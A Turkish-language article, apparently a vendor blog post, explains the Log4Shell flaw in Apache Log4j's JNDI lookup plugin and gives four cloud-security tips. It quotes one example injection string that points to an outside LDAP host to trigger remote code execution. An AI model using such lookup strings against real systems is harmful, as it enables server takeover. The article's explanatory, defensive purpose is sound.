Artık Log4Shell olarak adlandırılan Apache Log4j güvenlik açığı, güvenlik ekiplerini gafil avladı ve İnternet’te fırtınalar estirdi.
Görünüşte zararsız bir kayıt aracı, bilgisayar korsanları tarafından savunmasız uygulamaların kontrolünü ele geçirmek için kullanıldı. Apache bu güvenlik açığını “kritik” olarak değerlendirdi ve olası hasarı kontrol altına almak amacıyla bir yama yayınladı. Log4Shell ayrıca zirveyi aldı CVSS puanı 10. Bu, güvenlik açığının çok sayıda Web uygulamasının temelinde kullanılan bir kod parçasındaki kritik bir kusur olduğu ve son derece yaygın ve tehlikeli olarak kabul edildiği anlamına gelir.
Bu istismar, günlüklerin iyi huylu doğasına güvenerek çalışır. Günlükler genellikle saldırı vektörleri olarak kullanılmaz, bu nedenle bu saldırı birçok güvenlik kuruluşunu şaşırttı. Bu durumda, Log4Shell güvenlik açığı, Java uygulamalarının bir DNS veya LDAP dizininde depolanan nesneleri alması için bir yol sağlayan bir arama eklentisinde bulunur. Eklenti, “sadece” günlüğe kaydetmeden daha proaktif bir şey yapma becerisine izin verir ve sorunun anahtarı burada yatar – ve saldırgana bir uygulamayı hacklemek için bir günlük kaydı aracından yararlanma yeteneği verir.
JNDI Lookup eklentisi, Log4Shell güvenlik açığını içerir ve genel olarak, eklenti girişi sorguları yalnızca nesne adını içermelidir. Bununla birlikte, nesne adı yerine bir URL eklendiğinde — örneğin, $jndi:ldap://website.com/rce — Log4j belirtilen sunucudaki JNDI’ye bağlanacak ve Java nesnesini alacaktır. Bu, günlük kaydı sunucusunda uzaktan kod yürütülmesini sağlar.
Bu günlük kaydı aracının her yerde bulunan doğası, bilgisayar korsanları için yararlanma fırsatlarının sonsuz olduğu anlamına gelir.
Bulut uygulama güvenliği her zaman bir zorluk olmuştur. Bulut uygulamalarının sayısı artmaya devam etmekle kalmıyor, uygulamaların kendileri de gelişiyor ve zaman içinde kullanım değişiyor. Yine de bu uygulamaların büyüdükçe güvenli kalmasını ve güvenlik ekiplerimizin ayak uydurabilmesini bekliyoruz.
İşte sorun burada yatıyor. DevOps ekipleri her zamankinden daha hızlı yenilik yaparken, uygulamaların gelişmeye devam ederken korunmaya devam etmesini sağlamak çok önemlidir. Bu ve gelecek saldırılara karşı korunmak için kuruluşlar, önleyici kalmalı ve bulut uygulaması güvenlik stratejilerini, yalnızca bulut benimsemeyle ölçeklenmesini sağlamakla kalmayıp aynı zamanda sonraki sıfır gün saldırısı. İşte bunu gerçekleştirmenin birkaç yolu.
İpucu 1: Bulut güvenliği süreçlerinizde otomasyon oluşturun.
Genel bir kural olarak, bulut araçlarınız otomatik değilse, geliştirici ekiplerinize ayak uyduramazlar ve buna bulut güvenlik araçları da dahildir. Otomasyon olmadan önde kalamazlar, bir sonraki saldırıyı önleyemezler ve kötü aktörler bulamazlar. Uygulama geliştikçe yeni parçaların olabildiğince hızlı korunmasını sağlamak önemlidir.
İpucu 2: Mümkün olduğu kadar çok insan müdahalesini kaldırın.
Verileri yorumlamak ve makro trendlere bakmak için insan gözetimi önemli olsa da, insan yönetiminin bir bulut uygulamasında çalışan tüm mikro hizmetleri ve kodu izlemesi ve değerlendirmesi imkansızdır. Log4j istismarının gösterdiği gibi, ekipler güvenlik sistemlerini yamalamak için çabalarken, insan yönetimi uygulama güvenliğinde bir sorumluluktur. Modern teknoloji bize, uygulama daha önce hayal edebileceğimizden daha hızlı gelişirken güvenliği alakalı tutabilen makine öğrenimi ve yapay zekadan yararlanma fırsatı sunuyor. Bu fırsatı en üst düzeye çıkarmanın zamanı geldi.
3. İpucu: Güvenliğe sıfır güven yaklaşımı benimseyin.
Log4j istismarı gibi sıfır gün saldırılarıyla, ekiplerinizin yanıt vermek ve düzeltmek yerine saldırıları önlemek için sıfır güven yaklaşımını benimsemesi önemlidir. Güvenlik ekiplerinizin potansiyel güvenlik açıklarını keşfettikten sonra geri dönüp düzeltme yapma ihtiyacını ortadan kaldırmak için önleme sağlayan güvenliği kullanın.
4. İpucu: Hiçbir şey varsaymayın!
DevOps ekipleriniz uygulamaları oluştururken veya geliştirirken, tüm kod olarak altyapının ve diğer tüm üçüncü taraf kodlarının kuruluşunuzun güvenlik ilkeleriyle uyumlu olduğundan ve bir şekilde korunduğundan emin olun. Log4Shell, bilgisayar korsanlarının ne kadar yenilikçi olduğuna dair harika bir örnek.
Bulut, kuruluşlara yenilik ve başarı için fırsatlar verdi, ancak kötü aktörlerin bulutta aynı hız ve ölçek avantajlarından yararlandığını hatırlamak çok önemlidir. Log4j istismarı bunu kanıtlıyor. Kuruluşların sürekli olarak izleyebileceği ve gerektiğinde uyarabileceği doğru olsa da, bu, hiçbir zaman önleme ve önleyici tedbirler kadar etkili olmayan bir iyileştirmeyi temsil eder. Bu nedenle AI, günümüzün tehdit ortamında güvende kalmaya çalışırken kritik bir bileşendir.
Suçluların önünde kalmak için kuruluşlar, tüm bulut ortamlarında ve uygulama yaşam döngüleri boyunca uygulamalı, otomatik sıfır güven güvenliğinden yararlandıklarından emin olmalıdır.